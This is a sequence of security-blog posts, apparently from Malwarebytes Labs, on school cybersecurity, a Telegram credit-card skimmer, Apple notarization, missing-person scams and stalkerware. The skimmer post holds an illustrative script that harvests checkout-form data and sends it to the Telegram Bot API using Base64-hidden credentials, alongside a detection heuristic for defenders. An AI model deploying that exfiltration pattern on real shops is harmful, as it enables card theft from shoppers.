IT NEWS

How to keep K–12 distance learners cybersecure this school year

With the pandemic still in full swing, educational institutions across the US are kicking off the 2020–2021 school year in widely different ways, from re-opening classrooms to full-time distance learning. Sadly, as schools embracing virtual instruction struggle with compounding IT challenges on top of an already brittle infrastructure, they are nowhere near closing the K-12 cybersecurity gap.

Kids have no choice but to continue their studies within the current social and health climate. On top of this, they must get used to new learning setups—possibly multiple ones—whether they’re full-on distance learning, homeschooling, or a hybrid of in-class and home instruction.

Regardless of which of these setups school districts, parents, or guardians decide are best suited for their children, one thing should remain a priority: the overall security of students’ learning experience during the pandemic. For this, careful and considered preparation is needed.

New term, new terms

Parents in the United States are participating in their children’s learning like never before—and that was before the pandemic forced their hand. Now more than ever, it’s important for them to become familiar with the different educational setups and consider which is best suited for their family.

Full-on distance learning

Classes are held online while students are safe in their own homes. Teachers may offer virtual classes out of their own homes as well, or they may be using their empty classrooms for better bandwidth.

This setup requires families to have, ideally, a dedicated laptop or computer students can use for class sessions and independent work. In addition, a strong Internet connection is necessary to support both students and parents working from home. However, children in low-income families may have difficulties accessing this technology, unless the school is handing out laptops and hot spot devices for Wi-Fi. Often, there are delays distributing equipment and materials—not to mention a possible learning curve thanks to the Digital Divide.

Full-on distance learning provides children with the benefit of teacher instruction while being safe from exposure to the coronavirus.

Homeschool learning or homeschooling

Classes are held at home, with the parent or guardian acting as teacher, counselor, and yes, even IT expert to their kids. Nowadays, this setup is often called temporary homeschooling or emergency homeschooling. Although this is a viable and potentially budget-friendly option for some families, note that unavoidable challenges may arise along the way. This might be especially true for older children who are more accustomed to using technology in their studies.

This isn’t to say that the lack of technology use when instructing kids would result in low-quality learning. In fact, a study from Tilburg University [PDF] comparing traditional learning and digital learning among kids ages 6 to 8 showed that children perform better when taught the traditional way—although, the study further noted, they are more receptive to digital learning methods. But perhaps the most relevant implication from the study is this: The role of teachers (in this article’s context, the parents and guardians) in achieving desirable learning outcomes continues to be a central factor.

Parents and guardians may be faced with the challenge of out-of-the-box thinking when it comes to creating valuable lessons for their kids that target their learning style while keeping them on track for their grade level.

Hybrid learning

This is a combination of in-class and home instruction, wherein students go to school part-time with significant social distancing and safety measures, such as wearing masks, regular sanitizing of facilities and properties, and regular cleaning of hands. Students may be split into smaller groups, have staggered arrival times, and spend only a portion of their week in the classroom.

For the rest of students’ time, parents or guardians are tasked with continuing instruction at home. During these days or hours, parents or guardians must grapple with the same stressors on time, creativity, patience, and digital safety as those in distance learning and homeschooling models.

New methods of teaching and learning might be borne out of the combination of any or all three setups listed above. But regardless of how children must continue their education—with the worst or best of circumstances in mind—supporting their emotional and mental well-being is a priority. To achieve peace of mind and keep students focused on instruction, parents must also prioritize securing their children’s devices from online threats and the invasion of privacy.

Old threats, new risks

It’s a given that the learning environments that expose children to online threats and risk their privacy the most involve the use of technology. Some are familiar, and some are born from the changes introduced by the pandemic. Let’s look at the risk factors that make K-12 cybersecurity essential in schools and in homes.

Zoombombing. This is a cyberthreat that recently picked up steam due to the increased use of Zoom, a now-popular web conferencing tool. Employees, celebrities, friends, and family have used this app (and apps like it) to communicate in larger groups. Now it’s commonly adopted by schools for virtual instruction hours.

Since shelter-in-place procedures were enforced, stories of Zoombombing incidents have appeared left and right. Take, for example, the case of the unknown man who hacked into a Berkeley virtual class over Zoom to expose himself to high school students and shout obscenities. What made this case notable was the fact that the teacher of that class followed the recommended procedures to secure the session, yet a breach still took place.

Privacy issues. When it comes to children’s data, privacy is almost always the top issue. And there are many ways such data can be compromised: from organizational data breaches—something we’re all too familiar with at this point—to accidental leaking to unconsented data gathering from tools and/or apps introduced in a rush.

An accidental leaking incident happened in Oakland when administrators inadvertently posted hundreds of access codes and passwords used in online classes and video conferences to the public, allowing anyone with a Gmail account to not only join these classes but access student data.

In April 2020, a father filed a case against Google on behalf of his two kids for violating the Children’s Online Privacy Protection Act (COPPA) and the Biometric Information Privacy Act (BIPA) of Illinois. The father, Clinton Farwell, alleges that Google’s G Suite for Education service collects the data—their PII and biometrics—of children, who are aged 13 and below, to “secretly and unlawfully monitor and profile children, but to do so without the knowledge or consent of those children’s parents.”

This happened two months after Hector Balderas, the attorney general of New Mexico, filed a case against the company for continuing to track children outside the classroom.

Ransomware attacks. Educational institutions aren’t immune to ransomware attacks. Panama-Buena Vista Union School. Fort Worth Independent. Crystal Lake Community High School. These are just some of the districts—284 schools in all—that were hit by ransomware from the start of 2020 through the first week of April. Unfortunately, the pandemic won’t make them less of a target—only more.

With many K-12 schools adjusting to the pandemic—often introducing tools and apps that cater to remote learning without conducting security audits—it is almost expected that something bad is going to happen. The mad scramble to address the sudden change in demand only shows how unprepared these school districts were. It’s also unfortunate that administrative staff have to figure things out and learn for themselves how to better protect student data, especially if they don’t have a dedicated IT team. And, often, that learning curve is quite steep.

Phishing scams. In the education industry, phishing scams are an ever-present threat. According to Doug Levin, the founder and president of the K-12 Cybersecurity Resource Center, schools are subjected to “drive-by” phishing, in particular.

“Scammers and criminals really understand the human psyche and the desire for people to get more information and to feel in some cases, I think it’s fair to say in terms of coronavirus, some level of panic,” Levin said in an interview with EdWeek. “That makes people more likely to suspend judgment for messages that might otherwise be suspicious, and more likely to click on a document because it sounds urgent and important and relevant to them, even if they weren’t expecting it.”

Security tips for parents and guardians

To ensure distance learning and homeschooled students have an uninterrupted learning experience, parents or guardians should make sure that all the tools and gadgets their kids use for school are set up securely before classes begin. In fact, doing so is similar to keeping work devices secure while working from home. For clarity’s sake, let’s flesh out some general steps, shall we?

Secure your Wi-Fi

  • Make sure that the router or the hotspot is using a strong password. Not only that, switch the password every couple of months to keep it fresh.
  • Make sure that all firmware is updated.
  • Change the router’s admin credentials.
  • Turn on the router’s firewall.

Secure their device(s)

  • Make sure students’ computers or other devices are password-protected and lock automatically after a short period of time. This way, work won’t be lost by a pet running wild or a curious younger sister smashing some buttons.

    For schools that issue student laptops, the most common operating system is ChromeOS (Chromebooks). Here’s a simple and quick guide on how parents and guardians can lock Chromebooks. The password doesn’t need to be complicated, as you and your child should be able to remember it. Decide on a passphrase together, but don’t share it with the other kids in the house.

  • Ensure that the firewall is enabled in the device.
  • Enforce two-factor authentication (2FA).
  • Ensure that the device has endpoint protection installed and running in real time.

Secure your child’s data

  • Schools use a learning management system (LMS) to track children’s activities. It is also what kids use to access resources that they need for learning.

    Make sure that your child’s LMS password follows the school’s guidelines on how to create a high-entropy password. If the school doesn’t specify strong password guidelines, create a strong password yourself. Password managers can usually do this for you if thinking up a complicated password and remembering it feels like too much of a chore (see the short sketch after this list for a sense of what such a generator does).

  • It also pays to limit the use of the device your child uses for studying to only schoolwork. If there are other devices in the house, they can be used to access social media, YouTube, video games, and other recreational activities. This will lessen their chances of encountering an online threat on the same device that stores all their student data.
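
If you’re curious what a password manager or generator is actually doing when it creates a passphrase, the sketch below illustrates the idea in TypeScript. It picks words at random using a cryptographically secure random number generator. The word list here is a tiny illustrative sample; real generators draw from lists of thousands of words (such as the EFF’s Diceware lists) to achieve high entropy.

```typescript
// Minimal sketch of a passphrase generator, for illustration only.
// WORDS is a toy sample; real tools use word lists with thousands of entries.
import { randomInt } from "crypto";

const WORDS = ["maple", "rocket", "violet", "harbor", "pencil", "tiger", "cloud", "lantern"];

// Pick `count` words using a cryptographically secure RNG and join them.
function makePassphrase(count = 4, separator = "-"): string {
  const picks: string[] = [];
  for (let i = 0; i < count; i++) {
    picks.push(WORDS[randomInt(WORDS.length)]);
  }
  return picks.join(separator);
}

console.log(makePassphrase()); // e.g. "tiger-maple-cloud-violet"
```

A passphrase built from several randomly chosen words is both easier for a family to remember than a jumble of symbols and still hard for an attacker to guess.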

Secure your child’s privacy

There was a case in the past where a school accidentally turned on the cameras of the school-issued devices students were using. It blew up in the news because it was a serious violation of privacy. Although this may be considered a rare incident, you can’t be too careful when the device your kid uses has a built-in camera.

Students are often required to show their faces on video conference software so teachers know they are paying attention. But for all the other time spent on assignments, it’s a good idea to cover up built-in cameras. There are laptop camera covers parents or guardians can purchase to slide across the lens when it’s not in use.

New challenges, new opportunities to learn

While education authorities have had their hands full for months now, parents and guardians can do their part, too, by keeping their transition to a new learning environment as safe and frictionless as possible. As you may already know, some states have relaxed their lockdown rules, allowing schools to re-open. However, the technology train has left the station.

Even as in-person instruction continues, educational tech will become even more integral to students’ learning experiences. Keeping those specialized software suites, apps, communication tools, and devices safe from cyberthreats and privacy invasions will be imperative for all future generations of learners.

Safe, not sorry

While IT departments in educational institutions continue to wrestle with current cybersecurity challenges, parents and guardians have to step up their efforts and contribute to K-12 cybersecurity as a whole. Lock down your children’s devices, whether they use them in the classroom or at home. True, it will not guarantee 100 percent protection from cybercriminals, but at the very least, you can be assured that your kids and their devices will be far harder targets.

Stay safe!


New web skimmer steals credit card data, sends to crooks via Telegram

The digital credit card skimming landscape keeps evolving, often borrowing techniques used by other malware authors in order to avoid detection.

As defenders, we look for any kind of artifacts and malicious infrastructure that we might be able to identify to protect our users and alert affected merchants. These malicious artifacts can range from compromised stores to malicious JavaScript, domains, and IP addresses used to host a skimmer and exfiltrate data.

One such artifact is a so-called “gate,” which is typically a domain or IP address where stolen customer data is being sent and collected by cybercriminals. Typically, we see threat actors either stand up their own gate infrastructure or use compromised resources.

However, there are variations that involve abusing legitimate programs and services, thereby blending in with normal traffic. In this blog, we take a look at the latest web skimming trick, which consists of sending stolen credit card data via the popular instant messaging platform Telegram.

An otherwise normal shopping experience

We are seeing a large number of e-commerce sites attacked either through a common vulnerability or stolen credentials. Unaware shoppers may visit a merchant that has been compromised with a web skimmer and make a purchase while unknowingly handing over their credit card data to criminals.

Skimmers insert themselves seamlessly within the shopping experience and only those with a keen eye for detail or who are armed with the proper network tools may notice something’s not right.

Figure 1: Credit card skimmer using Telegram bot

The skimmer will become active on the payment page and surreptitiously exfiltrate the personal and banking information entered by the customer. In simple terms, things like name, address, credit card number, expiry, and CVV will be leaked via an instant message sent to a private Telegram channel.

Telegram-based skimmer

Telegram is a popular and legitimate instant messaging service that provides end-to-end encryption. A number of cybercriminals abuse it for their daily communications but also for automated tasks found in malware.

Attackers have used Telegram to exfiltrate data before, for example via traditional Trojan horses, such as the Masad stealer. However, security researcher @AffableKraut shared the first publicly documented instance of a credit card skimmer used in Telegram in a Twitter thread.

The skimmer code keeps with tradition in that it checks for the usual web debuggers to prevent being analyzed. It also looks for fields of interest, such as billing, payment, credit card number, expiration, and CVV.

Figure 2: First part of the skimmer code

The novelty is the presence of the Telegram code to exfiltrate the stolen data. The skimmer’s author encoded the bot ID and channel, as well as the Telegram API request with simple Base64 encoding to keep it away from prying eyes.

Figure 3: Skimming code containing Telegram’s API

The exfiltration is triggered only if the browser’s current URL contains a keyword indicative of a shopping site and when the user validates the purchase. At this point, the browser will send the payment details to both the legitimate payment processor and the cybercriminals.

Figure 4: A purchase where credit card data is stolen and exfiltrated

The fraudulent data exchange is conducted via Telegram’s API, which posts payment details into a chat channel. That data was previously encrypted to make identification more difficult.
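
To make the mechanism concrete, here is a heavily simplified, de-fanged sketch of how this style of exfiltration is typically structured. The field selectors, keyword list, and Base64 strings below are made-up placeholders for illustration; they are not the actual skimmer code described above.

```typescript
// Illustration of the exfiltration step only (all values are placeholders).
// The real skimmer also performs anti-debugging checks and broader field harvesting.

// The bot token and chat ID are stored Base64-encoded to defeat simple string searches.
const ENCODED_TOKEN = "PGJvdC10b2tlbi1wbGFjZWhvbGRlcj4="; // decodes to "<bot-token-placeholder>"
const ENCODED_CHAT = "PGNoYXQtaWQtcGxhY2Vob2xkZXI+";      // decodes to "<chat-id-placeholder>"

const CHECKOUT_KEYWORDS = ["checkout", "onepage", "payment"]; // illustrative keywords

function onCheckoutSubmit(): void {
  // Only fire on pages whose URL suggests a payment step.
  if (!CHECKOUT_KEYWORDS.some((k) => location.href.includes(k))) return;

  // Harvest whatever the victim typed into the payment form (hypothetical selectors).
  const stolen = Array.from(document.querySelectorAll<HTMLInputElement>("input"))
    .map((el) => `${el.name}=${el.value}`)
    .join("&");

  // Decode the endpoint pieces at the last moment and post the data to a
  // private channel via the Telegram Bot API's sendMessage method.
  const token = atob(ENCODED_TOKEN);
  const chat = atob(ENCODED_CHAT);
  fetch(
    `https://api.telegram.org/bot${token}/sendMessage` +
      `?chat_id=${encodeURIComponent(chat)}&text=${encodeURIComponent(stolen)}`
  );
}
```

Because the request goes to a legitimate, widely used domain over HTTPS, it blends into normal traffic, which is exactly what makes this variant attractive to the attackers.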

For threat actors, this data exfiltration mechanism is efficient and doesn’t require them to keep up infrastructure that could be taken down or blocked by defenders. They can even receive a notification in real time for each new victim, helping them quickly monetize the stolen cards in underground markets.

Challenges with network protection

Defending against this variant of a skimming attack is a little trickier since it relies on a legitimate communication service. One could obviously block all connections to Telegram at the network level, but attackers could easily switch to another provider or platform (as they have done before) and still get away with it.
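
That said, defenders can still hunt for the tell-tale artifacts. One rough heuristic is to look for the Telegram Bot API hostname, either in the clear or Base64-encoded, inside the scripts a page loads. The sketch below is our own simplification of that idea, not Malwarebytes’ detection logic; because Base64 output depends on byte alignment, the marker is encoded at all three possible offsets.

```typescript
// Rough heuristic: flag script bodies that reference the Telegram Bot API,
// either as plain text or as a Base64-encoded fragment.
const MARKER = "api.telegram.org/bot";

function base64Variants(needle: string): string[] {
  const variants: string[] = [];
  for (let shift = 0; shift < 3; shift++) {
    // Prepend `shift` dummy bytes so the needle lands at each possible 3-byte
    // alignment, then drop the leading/trailing characters that depend on
    // surrounding bytes and padding.
    const padded = Buffer.concat([Buffer.alloc(shift), Buffer.from(needle, "utf8")]);
    const encoded = padded.toString("base64");
    variants.push(encoded.slice(4, encoded.length - 4));
  }
  return variants;
}

function looksLikeTelegramSkimmer(scriptBody: string): boolean {
  return (
    scriptBody.includes(MARKER) ||
    base64Variants(MARKER).some((v) => scriptBody.includes(v))
  );
}
```

A match is only a signal to investigate, of course, since legitimate code can also talk to Telegram, but on a checkout page it deserves a very close look.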

Malwarebytes Browser Guard will identify and block this specific skimming attack without disabling or interfering with the use of Telegram or its API. So far we have only identified a couple of online stores that have been compromised with this variant, but there are likely several more.

Figure 5: Malwarebytes blocking this skimming attack

As always, we need to adapt our tools and methodologies to keep up with financially-motivated attacks targeting e-commerce platforms. Online merchants also play a huge role in derailing this criminal enterprise and preserving the trust of their customer base. By being proactive and vigilant, security researchers and e-commerce vendors can work together to defeat cybercriminals standing in the way of legitimate business.


Lock and Code S1Ep14: Uncovering security hubris with Adam Kujawa

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Adam Kujawa, security evangelist and director of Malwarebytes Labs, about “security hubris,” the simple phenomenon in which businesses are less secure than they believe themselves to be.

Ask yourself, right now, on a scale from one to ten, how cybersecure are you? Now, do you have any reused passwords for your online accounts? Does your home router still have its default password? If your business rolled out new software for you to use for working from home (WFH), do you know if those software platforms are secure?

If your original answer is looking a little shakier now, don’t be surprised. That is security hubris.

Tune in to hear about the dangers of security hubris to a business, how to protect against it, and about how Malwarebytes found it within our most recent report, “Enduring from home: COVID-19’s impact on business security,” on the latest episode of Lock and Code, with host David Ruiz.


We cover our own research on:

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

Other cybersecurity news:

  • The US government issued a warning about North Korean hackers targeting banks worldwide. (Source: BleepingComputer)
  • A team of academics from Switzerland has discovered a security bug that can be abused to bypass PIN codes for Visa contactless payments. (Source: ZDNet)
  • For governments and armed forces around the world, the digital domain has become a potential battlefield. (Source: Public Technology)
  • A new hacker-for-hire group is targeting organizations worldwide with malware hidden inside malicious 3ds Max plugins. (Source: Security Affairs)
  • The Qbot trojan evolves to hijack legitimate email threads. (Source: BetaNews)

Stay safe, everyone!


Apple’s notarization process fails to protect

In macOS Mojave, Apple introduced the concept of notarization, a process that developers can go through to ensure that their software is malware-free (and must go through for their software to run on macOS Catalina). This is meant to be another layer in Apple’s protection against malware. Unfortunately, it’s starting to look like notarization may be less security and more security theater.

What is notarization?

Notarization goes hand-in-hand with another security feature: code signing. So let’s talk about that first.

Code signing is a cryptographic process that enables a developer to provide authentication to their software. It verifies both who created the software and the integrity of that software. By code signing an app, developers can (to some degree) prevent it from being modified maliciously—or at the very least, make such modifications easily detectable.

The code signing process has been integral to Mac software development for years. The user has to jump through hoops to run unsigned software, so little mainstream Mac software today comes unsigned.

However, Mac software that is distributed outside the App Store never had to go through any kind of checks. This meant that malware authors could obtain a code signing certificate from Apple (for a mere $99) and use it to sign their malware, enabling it to run without trouble. Of course, once such malware is discovered, Apple can revoke the code signing certificate, thus neutralizing it. However, malware can often go undiscovered for years, as illustrated best by the FruitFly malware, which went undetected for at least 10 years.

In light of this problem, Apple created a process they call “notarization.” This process involves developers submitting their software to Apple. That software goes through some kind of automated scan to ensure it doesn’t contain malware, and then is either rejected or notarized (i.e., certified as malware-free by Apple—in theory).

In macOS Catalina, software that is not notarized is prevented from running at all. If you try, you will simply be told “do not pass Go, do not collect $200.” (Or in Apple’s words, it can’t be opened because “Apple cannot check it for malicious software.”)

The message displayed by Catalina for older versions of Spotify

There are, of course, ways to run software that is not signed or not notarized, but the error message gives no indication of how, so as far as the average user is concerned, it’s not an option.
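
As an aside, curious users can check how an app on their own Mac is signed, and whether it carries a stapled notarization ticket, using Apple’s command-line tools (codesign, spctl, and stapler). The snippet below is just a small TypeScript (Node) wrapper around those tools for convenience; the flags shown are the commonly documented ones but may vary across macOS versions, and the app path is a made-up example.

```typescript
// Sketch: shell out to Apple's own tools to inspect an app bundle on macOS.
// Requires the Xcode command-line tools; APP is a hypothetical path.
import { execSync } from "child_process";

const APP = "/Applications/SomeApp.app";

function run(cmd: string): string {
  try {
    return execSync(cmd, { encoding: "utf8" });
  } catch (err: any) {
    // A non-zero exit (e.g. unsigned or rejected) still carries useful output.
    return `${err.stdout ?? ""}${err.stderr ?? ""}`;
  }
}

// Is the code signature present and intact, and who signed it?
console.log(run(`codesign --verify --deep --strict --verbose=2 "${APP}" 2>&1`));
// Would Gatekeeper allow it to run?
console.log(run(`spctl --assess --type execute --verbose "${APP}" 2>&1`));
// Is a notarization ticket stapled to the bundle?
console.log(run(`xcrun stapler validate "${APP}" 2>&1`));
```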

So how’s that working out so far?

The big question on everyone’s minds when notarization was announced at Apple’s WWDC conference in 2019 was: “How effective is this going to be?” Many were quite optimistic that this would spell the end of Mac malware once and for all. However, those of us in the security industry did not drink the Kool-Aid. Turns out, our skepticism was warranted.

There are a couple of tricks the bad guys are using in light of the new requirements. One is simple: don’t sign or notarize the apps at all.

We’re seeing quite a few cases where malware authors have stopped signing their software, and have instead been shipping it with instructions to the user on how to run it.

Unsigned Mac malware

As can be seen from the above screenshot, the malware comes on a disk image (.dmg) file with a custom background. That background image shows instructions for opening the software, which is neither signed nor notarized.

The irony here is that we see lots of people getting infected with this malware—a variant of the Shlayer or Bundlore adware, depending on who you ask—despite the minor difficulty of opening it. Meanwhile, the installation of security software on macOS has gotten to be so difficult that we get a fair number of support cases about it.

The other option, of course, is for threat actors to get their malware notarized.

Notarize malware?! Say it ain’t so!

In theory, the notarization process is supposed to weed out anything malicious. In practice, nobody really understands exactly how notarization works, and Apple is not inclined to share details. (For good reason—if they told the bad guys how they were checking for malware, the bad guys would know how to avoid getting caught by those checks.)

All developers and security researchers know is that notarization is fast. I’ve personally notarized software quite a few times at this point, and it usually takes less than a couple of minutes between submission and receipt of the e-mail confirming successful notarization. That means there’s definitely no human intervention involved in the process, as there is with App Store reviews. Whatever the checks are, they’re solely automated.

I’ve assumed since notarization was first introduced that it would turn out to be fallible. I’ve even toyed with the idea of testing this process, though the risk of getting my developer account “Charlie Millered” has prevented me from doing so. (Charlie Miller is a well-known security researcher who created a proof-of-concept malware app and got it into the iOS App Store in 2011. Even though he notified Apple after getting the app approved, Apple still revoked his developer account and he has been banned from further Apple development activity ever since.)

It turns out, though, that all I had to do was wait for the bad guys to run the test for me. According to new findings, Mac security researcher Patrick Wardle has discovered samples of the Shlayer adware that are notarized. Yes, that’s correct. Apple’s notarization process has allowed known malware to pass through undetected, and to be implicitly vouched for by Apple.

How did they do that?

We’re still not exactly sure what the Shlayer folks did to get their malware notarized, but increasingly, it’s looking like they did nothing at all. On the surface, little has changed.

Comparison of two Shlayer installers

The above screenshot shows a notarized Shlayer sample on the left, and an older one on the right. There’s no difference at all in the appearance. But what about when you dive into the code?

Comparison of the code of two Shlayer samples

This screenshot is hardly a comprehensive look into the code. It simply shows the entry point, and the names of a number of the functions found in the code. Still, at this level, any differences in the code are minor.

It’s entirely possible that something in this code, somewhere, was modified to break any detection that Apple might have had for this adware. Without knowing how (if?) Apple was detecting the older sample (shown on the right), it would be quite difficult to identify whether any changes were made to the notarized sample (on the left) that would break that detection.

This leaves us facing two distinct possibilities, neither of which is particularly appealing. Either Apple was able to detect Shlayer as part of the notarization process, but breaking that detection was trivial, or Apple had nothing in the notarization process to detect Shlayer, which has been around for a couple of years at this point.

What does this mean?

This discovery doesn’t change anything from my perspective, as a skeptical and somewhat paranoid security researcher. However, it should help “normal” Mac users open their eyes and recognize that the Apple stamp does not automatically mean “safe.”

Apple wants you to believe that their systems are safe from malware. Although they no longer run the infamous “Macs don’t get viruses” ads, Apple never talks about malware publicly, and loves to give the impression that its systems are secure. Unfortunately, the opposite has been proven to be the case with great regularity. Macs—and iOS devices like iPhones and iPads, for that matter—are not invulnerable, and their built-in security mechanisms cannot protect users completely from infection.

Don’t get me wrong, I still use and love Mac and iOS devices. I don’t want to give the impression that they shouldn’t be used at all. It’s important to understand, though, that you must be just as careful with what you do with your Apple devices as you would be with your Windows or Android devices. And when in doubt, an extra layer of anti-malware protection goes a long way in providing peace of mind.


Missing person scams: what to watch out for

Social media has a long history of people asking for help or giving advice to other users. One common feature is the ubiquitous “missing person” post. You’ve almost certainly seen one, and may well have amplified such a post on Facebook, Twitter, or even a blog.

The sheer reach and virality of social media is perfect for alerting others. It really is akin to climbing onto a rooftop with a foghorn and blasting out your message to the masses. However, the flipside is an ugly one.

Social media is also a breeding ground for phishers, scammers, trolls, and domestic abusers working themselves into missing person narratives. When this happens, there can be serious consequences.

“My friend is missing, please retweet…”

Panicked, urgent requests for information are how these missing person scams spread. They’re very popular on social media and can easily reach the specific, geographically targeted audience the message needs to go to.

If posted to platforms other than Twitter, they may well also come with a few links which offer additional information. The links may or may not be official law enforcement resources.

Occasionally, links lead to dedicated missing person detection organisations offering additional services.

You may well receive a missing person notice or request through email, as opposed to something posted to the wider world at large.

All useful ways to get the word out, but also very open to exploitation.

How can this go wrong?

The ease of sharing on social media is also the biggest danger where missing person requests are concerned. If someone pops up in your timeline begging for help to find a relative who went missing overnight, the impulse to share is very strong. It takes less than a second to hit Retweet or share, and you’ve done your bit for the day.

However.

If you’re not performing due diligence on who is doing the sharing, this could potentially endanger the person in the images. Is the person sharing the information directly a verified presence on the platform you’re using, or a newly created throwaway account?

If they are verified, are they sharing it from a position of personal interest, or simply retweeting somebody else? Do they know the person they’re retweeting, or is it a random person? Do they link to a website, and is it an official law enforcement source or something else altogether?

Even if the person sharing it first-hand is verified or they know the person they’re sharing content from, that doesn’t mean what you’re seeing is on the level.

What if the non-verified person is a domestic abuser, looking for an easy way to track down someone who’s escaped their malign presence? What if the verified individual is the abuser? We simply don’t know, but by the time you may have considered this the Tweet has already been and gone.

When maliciousness is “Just a prank, bro”

Even if the person asking to find somebody isn’t some form of domestic abuser, there’s a rapidly sliding scale of badness waiting to pounce. Often, people will put these sorts of requests out for a joke, or as part of a meme. They’ll grab an image most likely well known in one geographic region but not another, and then share asking for information. This can often bleed into other memes.

“Have you seen this person, they stole my phone and didn’t realise it took a picture” is a popular one, often at the expense of a local D-list celebrity. In the same way, people will often make bad taste jokes but related to missing children. To avoid the gag being punctured early, they may avoid using imagery from actual abduction cases and grab a still from a random YouTube clip or something from an image resource.

A little girl, lost in Doncaster?

One such example of this happened in the last few weeks. A still image appeared to show a small child in distress, bolted onto a “missing” plea for help.

Well, she really was in distress…but as a result of an ice hockey player leaving his team in 2015, and not because she’d gone missing or been abducted. There’s a link provided claiming to offer CCTV footage of a non-existent abduction, though reports don’t say where the links took eager clickers.

A panic-filled message supplied with a link is a common tactic in these realms. The same thing happened with a similar story in April of 2019. Someone claimed their 10-year-old sister had gone missing outside school after an argument with her friend. However, it didn’t take long for the thread to unravel. Observant Facebook users noted that schools would have been closed on the day it supposedly happened.

Additionally, others mentioned that they’d seen the same missing sister message from multiple Facebook profiles. As with the most recent fake missing story, we don’t know where the link wound up. People understandably either steered clear or visited but didn’t take a screenshot and never spoke of it again.

“My child is missing”: an eternally popular scam

There was another one doing the rounds in June this year, once more claiming a child was missing. Despite its seemingly US-centric language, the page appeared for British users in Lichfield, Bloxwich, Wolverhampton, and Walsall. Mentions of “police captains” and “downtown” fairly gave the game away, hinting at its generic cut-and-paste origins. The fact that it cites multiple conflicting dates for when the kidnapping took place is also a giveaway.

This one was apparently a Facebook phish, and was quite successful in 2020. So much so that it first appeared in March, and then May, before putting in its June performance. Scammers continue to use it because it’s easy to throw together, and it works.

Exploiting a genuine request

It’s not just scammers taking the lead and posting fake missing person posts. They’ll also insert themselves into other people’s misery and do whatever they can to grab some ill-gotten gains. An example of this dates to 2013, when someone mentioned that they’d tried to reunite with their long-lost sister via a “Have you seen this person” style letter.

The letter was published in a magazine, and someone got in touch. Unfortunately, that person claimed they were holding the sister hostage and demanded a ransom. The cover story quickly fell apart after they claimed certain relatives were dead when they were alive, and the missing person scam was foiled.

Here’s a similar awful scam from 2016, where Facebook scammers claimed someone’s missing daughter was a sex worker in Atlanta. They said she was being trafficked and could be “bought back” for $70,000. A terrible thing to tell someone, but then these people aren’t looking to play fair.

Fake detection agencies

Some of these fakes will find you via the post-box, as opposed to merely lurking online. There have been cases where so-called “recovery bureaus” drop you a note claiming to be able to lead you to missing people. When you meet up with the arranged contacts, though, the demands for big slices of cash start coming. What information they do have is likely publicly sourced or otherwise easily obtainable (and not worth the asking price).

Looking for validation

Helping people is great and assisting on social media is a good thing. We just need to be careful we’re aiding the right people. While it may not always be possible for a missing person alert to come directly from an official police source, it would be worth taking a little bit of time to dig into the message, and the person posting it, before sharing further.

The issue of people going missing is bad enough; we shouldn’t look to compound misery by unwittingly aiding people up to no good.


Good news: Stalkerware survey results show majority of people aren’t creepy

Back in July, we sent out a survey to Malwarebytes Labs readers on the subject of stalkerware—the term used to describe apps that can potentially invade someone’s privacy. We asked one question: “Have you ever used an app to monitor your partner’s phone?” 

The results were reassuring.

We received 4,578 responses from readers all over the world to our stalkerware survey and the answer was a resounding “NO.” An overwhelming 98.23 percent of respondents said they had not used an app to monitor their partner’s phone.


For our part, Malwarebytes takes stalkerware seriously. We’ve been detecting apps with monitoring capabilities for more than six years—now Malwarebytes for Windows, Mac, or Android detects, and allows users to block, applications that attempt to monitor their online behavior and/or physical whereabouts without their knowledge or consent. Last year, we helped co-found the Coalition Against Stalkerware with the Electronic Frontier Foundation, the National Network to End Domestic Violence, and several other AV vendors and advocacy groups.

It stands to reason that a readership made up of Malwarebytes customers and people with a strong interest in cybersecurity would say “no” to stalkerware—we’ve spoken up for a long time about the potential privacy concerns associated with using these apps and the danger of equipping software with high-grade surveillance capabilities. We didn’t want to assume everyone agreed with us, but the data from our stalkerware survey shows our instincts were right.

No to stalkerware

Beyond a simple yes or no, we also asked our survey-takers to explain why they answered the way they did. The most common answer by far was mutual respect for, and trust in, their partner. In fact, “respect,” “trust,” and “privacy” were the three most commonly used words by our participants in their responses:

“My partner and I share our lives … To monitor someone else’s phone is a tragic lack of trust.”

Many of those surveyed cited the Golden Rule (treat others the way you want to be treated) as their reason for not using stalkerware-type apps:

“I wouldn’t want anyone to monitor me so I therefore I would not monitor them.”

Others saw it as a clear-cut issue of ethics:

“People are entitled to their privacy as long as they do not do things that are illegal. Their rights end at the beginning of mine.”

Some respondents shared harrowing real-life accounts of being a victim of stalkerware or otherwise having their privacy violated:

“I have been a victim of stalking several times when vicious criminals used my own surveillance cameras to spy on my activity then used it to break into my apartment.”

Stalkerware vs. location sharing vs. parental monitoring

Many of those surveyed, answering either yes or no, made a distinction between stalkerware-type apps writ large and location-sharing apps like Apple’s Find My Phone and Google Maps. Location sharing was generally considered acceptable because users volunteered to share their own information and sharing was limited to their current location.

“My wife & myself allow Apple Find My Phone to track each other if required. I was keen that should I not arrive home from a run, she could find out where I was in the case of a health issue or accident.”

Also considered okay by our respondents were the types of parental controls packaged in by default with their various devices. Many respondents specifically mentioned tracking their child’s location:

“It would not be ok with me if someone was monitoring me and I would never do it to anyone else, the only thing I would like is be able to track my child if kidnapped.”

Some parents admitted to using monitoring of some kind with their children, but it wasn’t clear how far they were willing to go and if children were aware they were being monitored:

“The only reason I have set up parental control for my son is for his safety most importantly.”

This is the murky world of parental-monitoring apps. On one end of the spectrum there are the first-party parental controls like those built into the iPhone and Nintendo Switch. These controls allow parents to restrict screen time and approve games and additional content on an ad hoc basis. Then there are third-party apps, which provide limited capabilities to track one thing and one thing only, like, say, a child’s location, or their screen time, or the websites they are visiting.

On the other end of the spectrum, there are apps in the same parental monitoring category that can provide a far broader breadth of monitoring, from tracking all of a child’s interactions on social media to using a keylogger that might even reveal online searches meant to stay private. 

You can hear more about our take on these apps in our latest podcast episode, but the long and the short of it is that Malwarebytes doesn’t recommend them, as they can feature much of the same high-tech surveillance capabilities of nation-state malware and stalkerware, but often lack basic cybersecurity and privacy measures.

Who said ‘yes’ to stalkerware?

Of course, our stalkerware survey analysis would not be complete without taking a look at the 81 responses from those who said “yes” to using apps to monitor their partners’ phones.

Again, the majority of respondents made a distinction between consensual location-sharing apps and the more intrusive types of monitoring that stalkerware can provide. Many of those who answered “yes” to using an app to monitor their partner’s phone said things like:

“My wife and I have both enabled Google’s location sharing service. It can be useful if we need to know where each other is.”

And:

